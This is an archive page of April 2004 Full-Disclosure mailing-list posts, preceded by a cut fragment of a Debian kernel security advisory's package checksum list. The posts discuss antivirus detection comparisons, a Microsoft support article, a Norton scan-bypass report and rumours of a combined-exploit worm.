http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody4.dsc
  Size/MD5 checksum:  792 a21174ff774b45160cf3f714ea1ec226

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody4.tar.gz
  Size/MD5 checksum:  1032076 96e1ae069ef39afbdae505edc6f11375

  Architecture independent components:


http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody2_all.deb
  Size/MD5 checksum:  1783144 deaa1a0705f5f334ebbc60734b6bc2c7

http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody2_all.deb
  Size/MD5 checksum: 25895130 f42c8c0b27e644d024e33738a5c87863


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody4_all.deb
  Size/MD5 checksum:  1032600 c7ec4194385c7ee8601c7f4c87490d2f

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody4_mips.deb
  Size/MD5 c

Re: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results

2004-04-17 Thread Daniel H. Renner
On Fri, 2004-04-16 at 06:59, [EMAIL PROTECTED]
wrote:
> Reply-To: "Rafel Ivgi, The-Insider" <[EMAIL PROTECTED]>
> From: "Rafel Ivgi, The-Insider" <[EMAIL PROTECTED]>
> To: "bugtraq" <[EMAIL PROTECTED]>
> Date: Fri, 16 Apr 2004 13:47:59 +0200
> Subject: [Full-Disclosure] Hi! Antiviruses Comparison - A Little Research Results
> 
> Hi everyone!
> Just wanted to say to all of you that Mcafee(Pro 8) seems to be the best 
> antivirus around.
> Mcafee auto updates itself without asking(norton asks). And displays
> It is the only one(from norton 2004,panda and mcafee) who identifies the 
> following as viruses/backdoors:
> 
> 1. VBS/Inor.B
> 2. VBS/Psyme
> 3. Exploit -CodeBase.Gen
> 4. JS/Exploit-FileProxy
> 5. JV/ShinWow
> 6. X-Wreck(my own - unpublished backdoor - identified by the heuristic 
> engine)
> 7. http://www.realtime-spy.com keylogger
> 8. Cain & Abel(which is a trojan) - as possibly evil tool
> 9. Nmap - as possibly evil tool
> 
> As the facts prove mcafee is the best for now, though i saw a research 
> claiming BitDefender
> as the best. BitDefender is great, but comparing it with mcafee is a little 
> hard task to do.
> 
> 
> Rafel Ivgi, The-Insider. 
> 

The test results (sponsored by "PC Utilities" mag) at this site agree
with most of your observations:
http://www.virus.gr/english/fullxml/default.asp?id=62&mnu=62
-- 


Cheers,

Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700




Re: [Full-Disclosure] Re: "Delete anti-virus and firewall software" --Microsoft

2004-04-17 Thread Daniel H. Renner
MS has not removed the page from their Japanese pages which can be found
here:
http://support.microsoft.com/default.aspx?scid=kb;ja;820673

Translation via Babelfish can be done with cut-paste of the article
itself here:
http://babelfish.altavista.com/
-- 


Cheers,

Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700


On Fri, 2004-04-16 at 15:13, [EMAIL PROTECTED]
wrote:
Date: Fri, 16 Apr 2004 16:08:25 -0500
From: hggdh <[EMAIL PROTECTED]>
Reply-To: hggdh <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: "Delete anti-virus and firewall software"
--Microsoft

Hello Kim,

Friday, April 16, 2004, 12:00:37 PM, you wrote:


KS> Isn't the "Resolution" in this Knowledge Base article a little, uh,
KS> ill-advised:

KS> 

Alas, it seems Microsoft has been reading full-disclosure lately...
the page seems to have been taken off-line.
-- 

 ..hggdh..







Re: [Full-Disclosure] Norton AntiVirus nested file manual scan bypass.....[silent patch???]

2004-04-17 Thread bipin gautam
tomchop
posting on bugtraq isn't a big deal. :? 
http://www.geocities.com/visitbipin/ <-c' that out!

btw: the bug has been fixed in the latest updates of
NAV 2002 [that was a silent patch!]


--- bipin gautam <[EMAIL PROTECTED]> wrote:
> Norton AntiVirus nested file manual scan bypass.
> 
> Product Version: Norton Antivirus 2002 (~Only tested
> On...~)
> Risk Impact: Medium
> 
--







[Full-Disclosure] Super Worm

2004-04-17 Thread lists
The Internet Storm Center handler's diary talks about a super worm that 
might exploit several of the issues addressed in Tuesday's patches from 
Microsoft.  I've also heard some rumblings like that but haven't been
able to confirm anything.  

Anyone else hearing this kind of info?

Jason



Re: [Full-Disclosure] Super Worm

2004-04-17 Thread John Sage
hmm..

On Sat, Apr 17, 2004 at 09:57:19PM -0500, [EMAIL PROTECTED] wrote:
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Super Worm
> Date: Sat, 17 Apr 2004 21:57:19 -0500 (CDT)
> 
> The Internet Storm Center handler's diary talks about a super worm
> that might exploit several of the issues addressed in Tuesday's patches
> from Microsoft.  I've also heard some rumblings like that but
> haven't been able to confirm anything.

What it says is:

"Possible combined exploits of MS vulnerabilities"

"It has been a very quiet day, but we are hearing rumors of possible
'super' exploits that may target several of the vulnerabilities
announced by Microsoft on Tuesday. We've been contacted by an
individual who has been infected by such an exploit, but
investigation of this is still underway."


I'm not sure that "possible 'super' exploits" - plural - translates
literally into "super worm" - singular.

The only reason I bring this up is that within hours we'll probably be
seeing stories on news.google.com about "Experts say new Super Worm
threatens existence of Internet!"


- John
-- 
10 print "Home"
20 print "Sweet"
30 goto 10
